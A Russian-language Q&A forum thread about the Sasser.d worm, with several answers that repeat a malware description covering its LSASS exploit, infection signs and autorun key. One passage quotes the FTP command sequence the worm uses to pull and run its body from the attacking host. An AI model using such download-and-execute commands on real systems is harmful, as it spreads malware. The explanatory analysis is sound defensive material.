Sasser вирус
Автор RobinSparkles задал вопрос в разделе Компьютеры, Связь
что за вирус Worm.Win32.Sasser - Sasser.d ? и получил лучший ответ
Ответ от Ололош Ололоев[гуру]
ужасный вирус. он пожирает моск у глупых куритс
Ответ от Пользователь удален[новичек]
червяк
червяк
Ответ от Phoenix[гуру]
Ответ от Викторович[мастер]
Вирус-червь. Распространяется по глобальным сетям, используя для своего размножения уязвимость в службе LSASS Microsoft Windows. Ее описание приведено в Microsoft Security Bulletin MS04-011.Патч, исправляющий данную уязвимость был выпущен 13 апреля 2004 года . Первые экземпляры червя были обнаружены 30 апреля 2004 года.Принцип работы червя очень схож с тем, что был использован в черве Lovesan, в августе 2003 года, за исключением того, что Lovesan использовал аналогичную уязвимость в другой службе Windows - RPC DCOM.Заражению подвержены компьютеры, работающие под управлением Windows 2000, Windows XP, Windows Server 2003. На других версиях Windows червь работоспособен, но заразить их извне, путем атаки через уязвимость, не сможет.Червь написан на языке C/C++, с использованием компилятора Visual C. Имеет размер около 15 КБ, упакован PECompact2.Признаками заражения компьютера являются:Наличие файла "avserve.exe" в каталоге Windows. Сообщение об ошибке (LSASS service failing) приводящее к перезагрузке системы. РазмножениеПри запуске червь копирует себя в корневой каталог Windows с именем "avserve.exe" и регистрирует себя в ключе автозапуска:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "avserve.exe" = "%WINDIR%\avserve.exe"Создает в памяти уникальный идентификатор "Jobaka3l" для определения своего присутствия в системе.Запускает FTP службу на порту TCP 5554 и запускает 128 процедур своего размножения. В ходе работы червь пытается вызвать системную процедуру AbortSystemShutdown для запрета перезагрузки системы.Червь запускает процедуры выбора IP-адресов для атаки и отсылает на порт TCP 445 запрос. В случае если удаленный компьютер отвечает на соединение и отправляет эксплоит LSASS, который, используя данную уязвимость, запускает на удаленной машине командную оболочку "cmd.exe" на TCP порту 9996.После этого червь передает на атакуемую машину команды для загрузки и запуска своего тела:echo offecho open [адрес машины с которой производится атака] 5554>>cmd.ftpecho anonymous>>cmd.ftpecho userecho bin>>cmd.ftpecho get [произвольное число] _up.exe>>cmd.ftpecho bye>>cmd.ftpecho onftp -s:cmd.ftp[произвольное число] _up.exeecho offdel cmd.ftpecho onТаким образом один и тот же компьютер может многократно подвергаться атакам и содержать несколько копий червя в виде файлов с именами, например:23101_up.exe5409_up.exeи т. д.
Вирус-червь. Распространяется по глобальным сетям, используя для своего размножения уязвимость в службе LSASS Microsoft Windows. Ее описание приведено в Microsoft Security Bulletin MS04-011.Патч, исправляющий данную уязвимость был выпущен 13 апреля 2004 года . Первые экземпляры червя были обнаружены 30 апреля 2004 года.Принцип работы червя очень схож с тем, что был использован в черве Lovesan, в августе 2003 года, за исключением того, что Lovesan использовал аналогичную уязвимость в другой службе Windows - RPC DCOM.Заражению подвержены компьютеры, работающие под управлением Windows 2000, Windows XP, Windows Server 2003. На других версиях Windows червь работоспособен, но заразить их извне, путем атаки через уязвимость, не сможет.Червь написан на языке C/C++, с использованием компилятора Visual C. Имеет размер около 15 КБ, упакован PECompact2.Признаками заражения компьютера являются:Наличие файла "avserve.exe" в каталоге Windows. Сообщение об ошибке (LSASS service failing) приводящее к перезагрузке системы. РазмножениеПри запуске червь копирует себя в корневой каталог Windows с именем "avserve.exe" и регистрирует себя в ключе автозапуска:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "avserve.exe" = "%WINDIR%\avserve.exe"Создает в памяти уникальный идентификатор "Jobaka3l" для определения своего присутствия в системе.Запускает FTP службу на порту TCP 5554 и запускает 128 процедур своего размножения. В ходе работы червь пытается вызвать системную процедуру AbortSystemShutdown для запрета перезагрузки системы.Червь запускает процедуры выбора IP-адресов для атаки и отсылает на порт TCP 445 запрос. В случае если удаленный компьютер отвечает на соединение и отправляет эксплоит LSASS, который, используя данную уязвимость, запускает на удаленной машине командную оболочку "cmd.exe" на TCP порту 9996.После этого червь передает на атакуемую машину команды для загрузки и запуска своего тела:echo offecho open [адрес машины с которой производится атака] 5554>>cmd.ftpecho anonymous>>cmd.ftpecho userecho bin>>cmd.ftpecho get [произвольное число] _up.exe>>cmd.ftpecho bye>>cmd.ftpecho onftp -s:cmd.ftp[произвольное число] _up.exeecho offdel cmd.ftpecho onТаким образом один и тот же компьютер может многократно подвергаться атакам и содержать несколько копий червя в виде файлов с именами, например:23101_up.exe5409_up.exeи т. д.
Ответ от Григорий Сергеевич™[гуру]
Вирус-червь. Распространяется по глобальным сетям, используя для своего размножения уязвимость в службе LSASS Microsoft Windows. Ее описание приведено в Microsoft Security Bulletin MS04-011.
Патч, исправляющий данную уязвимость был выпущен 13 апреля 2004 года (его можно найти на официальном сайте Майкрософт) . Первые экземпляры червя были обнаружены 30 апреля 2004 года.
Принцип работы червя очень схож с тем, что был использован в черве Lovesan, в августе 2003 года, за исключением того, что Lovesan использовал аналогичную уязвимость в другой службе Windows - RPC DCOM.
Заражению подвержены компьютеры, работающие под управлением Windows 2000, Windows XP, Windows Server 2003. На других версиях Windows червь работоспособен, но заразить их извне, путем атаки через уязвимость, не сможет.
Червь написан на языке C/C++, с использованием компилятора Visual C. Имеет размер около 15 КБ, упакован PECompact2.
Признаками заражения компьютера являются:
Наличие файла "avserve.exe" в каталоге Windows.
Сообщение об ошибке (LSASS service failing) приводящее к перезагрузке системы.
Скачать патч можно здесь:
Вирус-червь. Распространяется по глобальным сетям, используя для своего размножения уязвимость в службе LSASS Microsoft Windows. Ее описание приведено в Microsoft Security Bulletin MS04-011.
Патч, исправляющий данную уязвимость был выпущен 13 апреля 2004 года (его можно найти на официальном сайте Майкрософт) . Первые экземпляры червя были обнаружены 30 апреля 2004 года.
Принцип работы червя очень схож с тем, что был использован в черве Lovesan, в августе 2003 года, за исключением того, что Lovesan использовал аналогичную уязвимость в другой службе Windows - RPC DCOM.
Заражению подвержены компьютеры, работающие под управлением Windows 2000, Windows XP, Windows Server 2003. На других версиях Windows червь работоспособен, но заразить их извне, путем атаки через уязвимость, не сможет.
Червь написан на языке C/C++, с использованием компилятора Visual C. Имеет размер около 15 КБ, упакован PECompact2.
Признаками заражения компьютера являются:
Наличие файла "avserve.exe" в каталоге Windows.
Сообщение об ошибке (LSASS service failing) приводящее к перезагрузке системы.
Скачать патч можно здесь:
Ответ от 22 ответа[гуру]
Привет! Вот подборка тем с похожими вопросами и ответами на Ваш вопрос: что за вирус Worm.Win32.Sasser - Sasser.d ?